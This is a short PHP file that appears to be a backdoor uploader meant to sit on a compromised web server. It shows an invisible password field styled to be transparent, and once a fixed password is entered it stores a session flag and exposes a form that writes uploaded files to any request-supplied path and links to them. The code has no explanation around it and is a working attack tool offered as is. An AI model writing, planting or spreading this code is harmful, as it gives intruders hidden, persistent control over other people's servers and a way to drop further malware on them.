﻿<?php
@session_start();
@$p=$_POST['p'];if($p=="_"){$_SESSION['nst']="$p";}if(!isset($_SESSION['nst'])or$_SESSION['nst']!="_"){die("<style>#i{border:none;background-color:transparent;color:transparent;cursor:default;float:right}</style><form method=post><input id=i type=password name=p size=2></form>");}$files=@$_FILES["files"];if ($files["name"] != ''){$fullpath=$_REQUEST["path"] . $files["name"];if (move_uploaded_file($files['tmp_name'], $fullpath)) {echo "<center><h1><a href='$fullpath'>View file</a></h1></center>";}}echo '<html><body><form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Up"></form></body></html>';?>
